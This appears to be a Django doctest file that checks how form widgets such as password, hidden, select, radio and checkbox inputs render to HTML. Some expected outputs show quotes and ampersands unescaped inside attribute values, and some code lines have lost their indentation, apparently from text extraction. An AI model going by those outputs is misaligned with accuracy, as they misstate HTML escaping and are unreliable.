>>> w = PasswordInput(render_value=True)
>>> w.render('email', 'secret')
u'<input type="password" name="email" value="secret" />'
>>> w = PasswordInput(render_value=False)
>>> w.render('email', '')
u'<input type="password" name="email" />'
>>> w.render('email', None)
u'<input type="password" name="email" />'
>>> w.render('email', 'secret')
u'<input type="password" name="email" />'
>>> w = PasswordInput(attrs={'class': 'fun'}, render_value=False)
>>> w.render('email', 'secret')
u'<input type="password" class="fun" name="email" />'
# HiddenInput Widget ############################################################
>>> w = HiddenInput()
>>> w.render('email', '')
u'<input type="hidden" name="email" />'
>>> w.render('email', None)
u'<input type="hidden" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="hidden" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="hidden" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = HiddenInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="hidden" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = HiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="hidden" class="special" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = HiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', '', attrs={'class': 'special'})
u'<input type="hidden" class="special" name="email" />'
# MultipleHiddenInput Widget ##################################################
>>> w = MultipleHiddenInput()
>>> w.render('email', [])
u''
>>> w.render('email', None)
u''
>>> w.render('email', ['test@example.com'])
u'<input type="hidden" name="email" value="test@example.com" />'
>>> w.render('email', ['some "quoted" & ampersanded value'])
u'<input type="hidden" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', ['test@example.com', 'foo@example.com'])
u'<input type="hidden" name="email" value="test@example.com" />\n<input type="hidden" name="email" value="foo@example.com" />'
>>> w.render('email', ['test@example.com'], attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />'
>>> w.render('email', ['test@example.com', 'foo@example.com'], attrs={'class': 'fun'})
u'<input type="hidden" name="email" value="test@example.com" class="fun" />\n<input type="hidden" name="email" value="foo@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'fun'})
>>> w.render('email', [])
u''
>>> w.render('email', ['foo@example.com'])
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />'
>>> w.render('email', ['foo@example.com', 'test@example.com'])
u'<input type="hidden" class="fun" value="foo@example.com" name="email" />\n<input type="hidden" class="fun" value="test@example.com" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', ['foo@example.com'], attrs={'class': 'special'})
u'<input type="hidden" class="special" value="foo@example.com" name="email" />'
>>> w.render('email', ['ŠĐĆŽćžšđ'], attrs={'class': 'fun'})
u'<input type="hidden" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = MultipleHiddenInput(attrs={'class': 'pretty'})
>>> w.render('email', ['foo@example.com'], attrs={'class': 'special'})
u'<input type="hidden" class="special" value="foo@example.com" name="email" />'
# FileInput Widget ############################################################
>>> w = FileInput()
>>> w.render('email', '')
u'<input type="file" name="email" />'
>>> w.render('email', None)
u'<input type="file" name="email" />'
>>> w.render('email', 'test@example.com')
u'<input type="file" name="email" value="test@example.com" />'
>>> w.render('email', 'some "quoted" & ampersanded value')
u'<input type="file" name="email" value="some "quoted" & ampersanded value" />'
>>> w.render('email', 'test@example.com', attrs={'class': 'fun'})
u'<input type="file" name="email" value="test@example.com" class="fun" />'
You can also pass 'attrs' to the constructor:
>>> w = FileInput(attrs={'class': 'fun'})
>>> w.render('email', '')
u'<input type="file" class="fun" name="email" />'
>>> w.render('email', 'foo@example.com')
u'<input type="file" class="fun" value="foo@example.com" name="email" />'
>>> w.render('email', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<input type="file" class="fun" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" name="email" />'
# Textarea Widget #############################################################
>>> w = Textarea()
>>> w.render('msg', '')
u'<textarea rows="10" cols="40" name="msg"></textarea>'
>>> w.render('msg', None)
u'<textarea rows="10" cols="40" name="msg"></textarea>'
>>> w.render('msg', 'value')
u'<textarea rows="10" cols="40" name="msg">value</textarea>'
>>> w.render('msg', 'some "quoted" & ampersanded value')
u'<textarea rows="10" cols="40" name="msg">some "quoted" & ampersanded value</textarea>'
>>> w.render('msg', 'value', attrs={'class': 'pretty', 'rows': 20})
u'<textarea class="pretty" rows="20" cols="40" name="msg">value</textarea>'
You can also pass 'attrs' to the constructor:
>>> w = Textarea(attrs={'class': 'pretty'})
>>> w.render('msg', '')
u'<textarea rows="10" cols="40" name="msg" class="pretty"></textarea>'
>>> w.render('msg', 'example')
u'<textarea rows="10" cols="40" name="msg" class="pretty">example</textarea>'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = Textarea(attrs={'class': 'pretty'})
>>> w.render('msg', '', attrs={'class': 'special'})
u'<textarea rows="10" cols="40" name="msg" class="special"></textarea>'
>>> w.render('msg', 'ŠĐĆŽćžšđ', attrs={'class': 'fun'})
u'<textarea rows="10" cols="40" name="msg" class="fun">\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111</textarea>'
# CheckboxInput Widget ########################################################
>>> w = CheckboxInput()
>>> w.render('is_cool', '')
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', None)
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', False)
u'<input type="checkbox" name="is_cool" />'
>>> w.render('is_cool', True)
u'<input checked="checked" type="checkbox" name="is_cool" />'
Using any value that's not in ('', None, False, True) will check the checkbox
and set the 'value' attribute.
>>> w.render('is_cool', 'foo')
u'<input checked="checked" type="checkbox" name="is_cool" value="foo" />'
>>> w.render('is_cool', False, attrs={'class': 'pretty'})
u'<input type="checkbox" name="is_cool" class="pretty" />'
You can also pass 'attrs' to the constructor:
>>> w = CheckboxInput(attrs={'class': 'pretty'})
>>> w.render('is_cool', '')
u'<input type="checkbox" class="pretty" name="is_cool" />'
'attrs' passed to render() get precedence over those passed to the constructor:
>>> w = CheckboxInput(attrs={'class': 'pretty'})
>>> w.render('is_cool', '', attrs={'class': 'special'})
u'<input type="checkbox" class="special" name="is_cool" />'
You can pass 'check_test' to the constructor. This is a callable that takes the
value and returns True if the box should be checked.
>>> w = CheckboxInput(check_test=lambda value: value.startswith('hello'))
>>> w.render('greeting', '')
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', 'hello')
u'<input checked="checked" type="checkbox" name="greeting" value="hello" />'
>>> w.render('greeting', 'hello there')
u'<input checked="checked" type="checkbox" name="greeting" value="hello there" />'
>>> w.render('greeting', 'hello & goodbye')
u'<input checked="checked" type="checkbox" name="greeting" value="hello & goodbye" />'
A subtlety: If the 'check_test' argument cannot handle a value and raises any
exception during its __call__, then the exception will be swallowed and the box
will not be checked. In this example, the 'check_test' assumes the value has a
startswith() method, which fails for the values True, False and None.
>>> w.render('greeting', True)
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', False)
u'<input type="checkbox" name="greeting" />'
>>> w.render('greeting', None)
u'<input type="checkbox" name="greeting" />'
# Select Widget ###############################################################
>>> w = Select()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value is None, none of the options are selected:
>>> print w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select name="beatle">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
The value is compared to its str():
>>> print w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
The 'choices' argument can be any iterable:
>>> from itertools import chain
>>> def get_choices():
... for i in range(5):
... yield (i, i)
>>> print w.render('num', 2, choices=get_choices())
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
>>> things = ({'id': 1, 'name': 'And Boom'}, {'id': 2, 'name': 'One More Thing!'})
>>> class SomeForm(Form):
... somechoice = ChoiceField(choices=chain((('', '-'*9),), [(thing['id'], thing['name']) for thing in things]))
>>> f = SomeForm()
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>'
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="" selected="selected">---------</option>\n<option value="1">And Boom</option>\n<option value="2">One More Thing!</option>\n</select></td></tr>'
>>> f = SomeForm({'somechoice': 2})
>>> f.as_table()
u'<tr><th><label for="id_somechoice">Somechoice:</label></th><td><select name="somechoice" id="id_somechoice">\n<option value="">---------</option>\n<option value="1">And Boom</option>\n<option value="2" selected="selected">One More Thing!</option>\n</select></td></tr>'
You can also pass 'choices' to the constructor:
>>> w = Select(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('num', 2)
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('num', 2, choices=[(4, 4), (5, 5)])
<select name="num">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
>>> w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<select name="email">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>'
If choices is passed to the constructor and is a generator, it can be iterated
over multiple times without getting consumed:
>>> w = Select(choices=get_choices())
>>> print w.render('num', 2)
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
>>> print w.render('num', 3)
<select name="num">
<option value="0">0</option>
<option value="1">1</option>
<option value="2">2</option>
<option value="3" selected="selected">3</option>
<option value="4">4</option>
</select>
# NullBooleanSelect Widget ####################################################
>>> w = NullBooleanSelect()
>>> print w.render('is_cool', True)
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', False)
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
>>> print w.render('is_cool', None)
<select name="is_cool">
<option value="1" selected="selected">Unknown</option>
<option value="2">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', '2')
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2" selected="selected">Yes</option>
<option value="3">No</option>
</select>
>>> print w.render('is_cool', '3')
<select name="is_cool">
<option value="1">Unknown</option>
<option value="2">Yes</option>
<option value="3" selected="selected">No</option>
</select>
# SelectMultiple Widget #######################################################
>>> w = SelectMultiple()
>>> print w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
>>> print w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
>>> print w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P" selected="selected">Paul</option>
<option value="G">George</option>
<option value="R" selected="selected">Ringo</option>
</select>
If the value is None, none of the options are selected:
>>> print w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J">John</option>
<option value="P">Paul</option>
<option value="G">George</option>
<option value="R">Ringo</option>
</select>
If multiple values are given, but some of them are not valid, the valid ones are selected:
>>> print w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<select multiple="multiple" name="beatles">
<option value="J" selected="selected">John</option>
<option value="P">Paul</option>
<option value="G" selected="selected">George</option>
<option value="R">Ringo</option>
</select>
The value is compared to its str():
>>> print w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
>>> print w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
The 'choices' argument can be any iterable:
>>> def get_choices():
... for i in range(5):
... yield (i, i)
>>> print w.render('nums', [2], choices=get_choices())
<select multiple="multiple" name="nums">
<option value="0">0</option>
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
</select>
You can also pass 'choices' to the constructor:
>>> w = SelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('nums', [2])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
</select>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('nums', [2], choices=[(4, 4), (5, 5)])
<select multiple="multiple" name="nums">
<option value="1">1</option>
<option value="2" selected="selected">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
</select>
>>> w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<select multiple="multiple" name="nums">\n<option value="1">1</option>\n<option value="2">2</option>\n<option value="3">3</option>\n<option value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" selected="selected">\u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</option>\n<option value="\u0107\u017e\u0161\u0111">abc\u0107\u017e\u0161\u0111</option>\n</select>'
# RadioSelect Widget ##########################################################
>>> w = RadioSelect()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
If the value is None, none of the options are checked:
>>> print w.render('beatle', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
If the value corresponds to a label (but not to an option value), none of the options are checked:
>>> print w.render('beatle', 'John', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="radio" name="beatle" value="J" /> John</label></li>
<li><label><input type="radio" name="beatle" value="P" /> Paul</label></li>
<li><label><input type="radio" name="beatle" value="G" /> George</label></li>
<li><label><input type="radio" name="beatle" value="R" /> Ringo</label></li>
</ul>
The value is compared to its str():
>>> print w.render('num', 2, choices=[('1', '1'), ('2', '2'), ('3', '3')])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
>>> print w.render('num', '2', choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
>>> print w.render('num', 2, choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
The 'choices' argument can be any iterable:
>>> def get_choices():
... for i in range(5):
... yield (i, i)
>>> print w.render('num', 2, choices=get_choices())
<ul>
<li><label><input type="radio" name="num" value="0" /> 0</label></li>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
</ul>
You can also pass 'choices' to the constructor:
>>> w = RadioSelect(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('num', 2)
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
</ul>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('num', 2, choices=[(4, 4), (5, 5)])
<ul>
<li><label><input type="radio" name="num" value="1" /> 1</label></li>
<li><label><input checked="checked" type="radio" name="num" value="2" /> 2</label></li>
<li><label><input type="radio" name="num" value="3" /> 3</label></li>
<li><label><input type="radio" name="num" value="4" /> 4</label></li>
<li><label><input type="radio" name="num" value="5" /> 5</label></li>
</ul>
The render() method returns a RadioFieldRenderer object, whose str() is a <ul>.
You can manipulate that object directly to customize the way the RadioSelect
is rendered.
>>> w = RadioSelect()
>>> r = w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
>>> for inp in r:
... print inp
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>
<label><input type="radio" name="beatle" value="P" /> Paul</label>
<label><input type="radio" name="beatle" value="G" /> George</label>
<label><input type="radio" name="beatle" value="R" /> Ringo</label>
>>> for inp in r:
... print '%s<br />' % inp
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label><br />
<label><input type="radio" name="beatle" value="P" /> Paul</label><br />
<label><input type="radio" name="beatle" value="G" /> George</label><br />
<label><input type="radio" name="beatle" value="R" /> Ringo</label><br />
>>> for inp in r:
... print '<p>%s %s</p>' % (inp.tag(), inp.choice_label)
<p><input checked="checked" type="radio" name="beatle" value="J" /> John</p>
<p><input type="radio" name="beatle" value="P" /> Paul</p>
<p><input type="radio" name="beatle" value="G" /> George</p>
<p><input type="radio" name="beatle" value="R" /> Ringo</p>
>>> for inp in r:
... print '%s %s %s %s %s' % (inp.name, inp.value, inp.choice_value, inp.choice_label, inp.is_checked())
beatle J J John True
beatle J P Paul False
beatle J G George False
beatle J R Ringo False
A RadioFieldRenderer object also allows index access to individual RadioInput
objects.
>>> w = RadioSelect()
>>> r = w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
>>> print r[1]
<label><input type="radio" name="beatle" value="P" /> Paul</label>
>>> print r[0]
<label><input checked="checked" type="radio" name="beatle" value="J" /> John</label>
>>> r[0].is_checked()
True
>>> r[1].is_checked()
False
>>> r[1].name, r[1].value, r[1].choice_value, r[1].choice_label
('beatle', u'J', u'P', u'Paul')
>>> r[10]
Traceback (most recent call last):
...
IndexError: list index out of range
# Unicode choices are correctly rendered as HTML
>>> w = RadioSelect()
>>> unicode(w.render('email', 'ŠĐĆŽćžšđ', choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')]))
u'<ul>\n<li><label><input checked="checked" type="radio" name="email" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="radio" name="email" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>'
# Attributes provided at instantiation are passed to the constituent inputs
>>> w = RadioSelect(attrs={'id':'foo'})
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="radio" id="foo_0" value="J" name="beatle" /> John</label></li>
<li><label><input type="radio" id="foo_1" value="P" name="beatle" /> Paul</label></li>
<li><label><input type="radio" id="foo_2" value="G" name="beatle" /> George</label></li>
<li><label><input type="radio" id="foo_3" value="R" name="beatle" /> Ringo</label></li>
</ul>
# Attributes provided at render-time are passed to the constituent inputs
>>> w = RadioSelect()
>>> print w.render('beatle', 'J', choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')), attrs={'id':'bar'})
<ul>
<li><label><input checked="checked" type="radio" id="bar_0" value="J" name="beatle" /> John</label></li>
<li><label><input type="radio" id="bar_1" value="P" name="beatle" /> Paul</label></li>
<li><label><input type="radio" id="bar_2" value="G" name="beatle" /> George</label></li>
<li><label><input type="radio" id="bar_3" value="R" name="beatle" /> Ringo</label></li>
</ul>
# CheckboxSelectMultiple Widget ###############################################
>>> w = CheckboxSelectMultiple()
>>> print w.render('beatles', ['J'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
>>> print w.render('beatles', ['J', 'P'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
>>> print w.render('beatles', ['J', 'P', 'R'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If the value is None, none of the options are selected:
>>> print w.render('beatles', None, choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If the value corresponds to a label (but not to an option value), none of the options are selected:
>>> print w.render('beatles', ['John'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
If multiple values are given, but some of them are not valid, the valid ones are selected:
>>> print w.render('beatles', ['J', 'G', 'foo'], choices=(('J', 'John'), ('P', 'Paul'), ('G', 'George'), ('R', 'Ringo')))
<ul>
<li><label><input checked="checked" type="checkbox" name="beatles" value="J" /> John</label></li>
<li><label><input type="checkbox" name="beatles" value="P" /> Paul</label></li>
<li><label><input checked="checked" type="checkbox" name="beatles" value="G" /> George</label></li>
<li><label><input type="checkbox" name="beatles" value="R" /> Ringo</label></li>
</ul>
The value is compared to its str():
>>> print w.render('nums', [2], choices=[('1', '1'), ('2', '2'), ('3', '3')])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
>>> print w.render('nums', ['2'], choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
>>> print w.render('nums', [2], choices=[(1, 1), (2, 2), (3, 3)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
The 'choices' argument can be any iterable:
>>> def get_choices():
... for i in range(5):
... yield (i, i)
>>> print w.render('nums', [2], choices=get_choices())
<ul>
<li><label><input type="checkbox" name="nums" value="0" /> 0</label></li>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
</ul>
You can also pass 'choices' to the constructor:
>>> w = CheckboxSelectMultiple(choices=[(1, 1), (2, 2), (3, 3)])
>>> print w.render('nums', [2])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
</ul>
If 'choices' is passed to both the constructor and render(), then they'll both be in the output:
>>> print w.render('nums', [2], choices=[(4, 4), (5, 5)])
<ul>
<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>
<li><label><input checked="checked" type="checkbox" name="nums" value="2" /> 2</label></li>
<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>
<li><label><input type="checkbox" name="nums" value="4" /> 4</label></li>
<li><label><input type="checkbox" name="nums" value="5" /> 5</label></li>
</ul>
>>> w.render('nums', ['ŠĐĆŽćžšđ'], choices=[('ŠĐĆŽćžšđ', 'ŠĐabcĆŽćžšđ'), ('ćžšđ', 'abcćžšđ')])
u'<ul>\n<li><label><input type="checkbox" name="nums" value="1" /> 1</label></li>\n<li><label><input type="checkbox" name="nums" value="2" /> 2</label></li>\n<li><label><input type="checkbox" name="nums" value="3" /> 3</label></li>\n<li><label><input checked="checked" type="checkbox" name="nums" value="\u0160\u0110\u0106\u017d\u0107\u017e\u0161\u0111" /> \u0160\u0110abc\u0106\u017d\u0107\u017e\u0161\u0111</label></li>\n<li><label><input type="checkbox" name="nums" value="\u0107\u017e\u0161\u0111" /> abc\u0107\u017e\u0161\u0111</label></li>\n</ul>'
# MultiWidget #################################################################
>>> class MyMultiWidget(MultiWidget):
... def decompress(self, value):
... if value:
... return value.split('__')
... return ['', '']
... def format_output(self, rendered_widgets):
... return u'<br />'.join(rendered_widgets)
>>> w = MyMultiWidget(widgets=(TextInput(attrs={'class': 'big'}), TextInput(attrs={'class': 'small'})))
